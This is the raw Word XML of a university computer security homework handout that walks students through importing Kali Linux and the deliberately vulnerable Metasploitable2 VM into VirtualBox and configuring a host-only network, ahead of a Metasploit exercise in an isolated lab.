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F957" w14:textId="7545C43E" w:rsidR="00225BB9" w:rsidRPr="00AB013F" w:rsidRDefault="00225BB9" w:rsidP="00225BB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB013F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSC </w:t>
      </w:r>
      <w:r w:rsidR="005541AB" w:rsidRPr="00AB013F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>426 Computer Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB013F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746521" w:rsidRPr="00AB013F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HW 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25537701" w14:textId="630DBB00" w:rsidR="0029284A" w:rsidRPr="00397DED" w:rsidRDefault="0029284A"/>
    <w:p w14:paraId="2E7FD316" w14:textId="1C532904" w:rsidR="00225BB9" w:rsidRPr="00397DED" w:rsidRDefault="00225BB9" w:rsidP="00225BB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00A162EB" w:rsidRPr="00A162EB">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Gokul Natarajan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1C15D" w14:textId="411BAB46" w:rsidR="00225BB9" w:rsidRPr="00397DED" w:rsidRDefault="00225BB9" w:rsidP="00225BB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Assigned: </w:t>
      </w:r>
      <w:r w:rsidR="00746521">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/202</w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67944B3A" w14:textId="40B9E117" w:rsidR="00225BB9" w:rsidRPr="00397DED" w:rsidRDefault="00225BB9" w:rsidP="00225BB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Due: </w:t>
      </w:r>
      <w:r w:rsidR="00746521">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00746521">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/2021 at </w:t>
      </w:r>
      <w:r w:rsidR="005541AB" w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F93" w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005541AB" w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F93" w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E93C8" w14:textId="77777777" w:rsidR="00225BB9" w:rsidRPr="00397DED" w:rsidRDefault="00225BB9" w:rsidP="00225BB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Total points: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57A72B" w14:textId="54A56A66" w:rsidR="00840F39" w:rsidRDefault="008B78B2" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971A04A" w14:textId="7D4671BE" w:rsidR="00840F39" w:rsidRPr="008B78B2" w:rsidRDefault="00746521" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Homework</w:t>
      </w:r>
      <w:r w:rsidR="00840F39" w:rsidRPr="008B78B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5042A" w14:textId="0CFE300B" w:rsidR="00840F39" w:rsidRDefault="00746521" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">In this homework, you will install a Kali Linux VM with Metasploit, as well as an additional VM that runs </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable services. You will use Metasploit to exploit one of these services and get a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035A3FE" w14:textId="14E1167A" w:rsidR="008B78B2" w:rsidRDefault="008B78B2" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A27F993" w14:textId="7A16EE3D" w:rsidR="008B78B2" w:rsidRDefault="008B78B2" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F89B4DA" w14:textId="0AB7DF6C" w:rsidR="008B78B2" w:rsidRPr="006F22E8" w:rsidRDefault="00FE214E" w:rsidP="00840F39">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Setup and Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58CC99" w14:textId="4DAC9962" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718511A0" w14:textId="141232E9" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First, you will need to download Kali Linux. You can get the .ova file for Kali Linux at the link below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937D1F0" w14:textId="0D7DADFF" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2988BFE4" w14:textId="2E07A38D" w:rsidR="00746521" w:rsidRDefault="004B2C9D" w:rsidP="00746521">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00746521" w:rsidRPr="0087300E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-virtualbox-amd64.ova</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0706E6A8" w14:textId="627F750E" w:rsidR="00746521" w:rsidRPr="00746521" w:rsidRDefault="00746521" w:rsidP="00746521">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DAC2B8" w14:textId="61FF326A" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00746521">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83919">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mport the VM into VirtualBox by using the menu option </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83919">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>File -&gt; Import Appliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83919">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83919">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and selecting the downloaded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux .ova </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83919">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F8B83" w14:textId="47FF02C5" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1A16EF" w14:textId="163E0106" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA07F6" w14:textId="1312BDE7" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You will also need to download a second VM named Metasploitable2. This is a VM that intentionally runs services with known vulnerabilities in them. </w:t>
      </w:r>
      <w:r w:rsidR="00E61926">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You can download the Metasploitable2 VM at the link below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BF0A7" w14:textId="521C172D" w:rsidR="00E61926" w:rsidRDefault="00E61926" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB1F164" w14:textId="661CAA83" w:rsidR="00E61926" w:rsidRDefault="004B2C9D" w:rsidP="00E61926">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00E61926" w:rsidRPr="0087300E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/files/Metasploitable2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50D986C6" w14:textId="474B3B52" w:rsidR="00E61926" w:rsidRDefault="00E61926" w:rsidP="00E61926">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2F9A92" w14:textId="68674CF5" w:rsidR="00E61926" w:rsidRDefault="00E61926" w:rsidP="00E61926">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 is not distributed as an .ova file, so you will have to follow different steps for importing it. First, unzip </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61926">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>metasploitable-linux-2.0.0.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The .zip file contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61926">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Metasploitable.vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a virtual hard disk file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E00445E" w14:textId="4B4BC388" w:rsidR="00F41E9B" w:rsidRDefault="00F41E9B" w:rsidP="00E61926">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED2CB86" w14:textId="452DDC47" w:rsidR="00746521" w:rsidRDefault="00F41E9B" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, select New. Give the VM you are creating a name of your choice, change “Type” to Linux, and change “Version” to Ubuntu (64 bit). The recommended memory size is 1024 MB. Finally, under “Hard disk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”,  click</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Use an existing virtual hard disk”, and </w:t>
      </w:r>
      <w:r w:rsidR="000D0F01">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>then “Add”. N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">avigate to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61926">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Metasploitable.vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file you unzipped</w:t>
      </w:r>
      <w:r w:rsidR="000D0F01">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D0F01">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Finally, hit “Create”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145069A" w14:textId="501AF113" w:rsidR="0035097F" w:rsidRDefault="0035097F" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757FC978" w14:textId="045A97C6" w:rsidR="0035097F" w:rsidRDefault="000D0F01" w:rsidP="000D0F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C871C2E" wp14:editId="65BC8DF6">
            <wp:extent cx="4216400" cy="2747417"/>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218036" cy="2748483"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF81D64" w14:textId="77777777" w:rsidR="0035097F" w:rsidRDefault="0035097F" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3998A124" w14:textId="0D9F0AF6" w:rsidR="00746521" w:rsidRDefault="00746521" w:rsidP="00FE214E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C5AF06" w14:textId="1177DC77" w:rsidR="00F337B0" w:rsidRDefault="00F337B0" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Before starting up </w:t>
      </w:r>
      <w:r w:rsidR="00CB0782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, you will need to configure </w:t>
      </w:r>
      <w:r w:rsidR="00CB0782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> networking settings in VirtualBox so that </w:t>
      </w:r>
      <w:r w:rsidR="00CB0782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>they can communicate with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F53B6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>File -&gt; Host Network Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">edit the host-only adapter that you created in Lab 1. Make </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sure that DHCP is </w:t>
      </w:r>
      <w:r w:rsidR="00CB0782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edit the IPv4 address to be 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if it is not so already)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
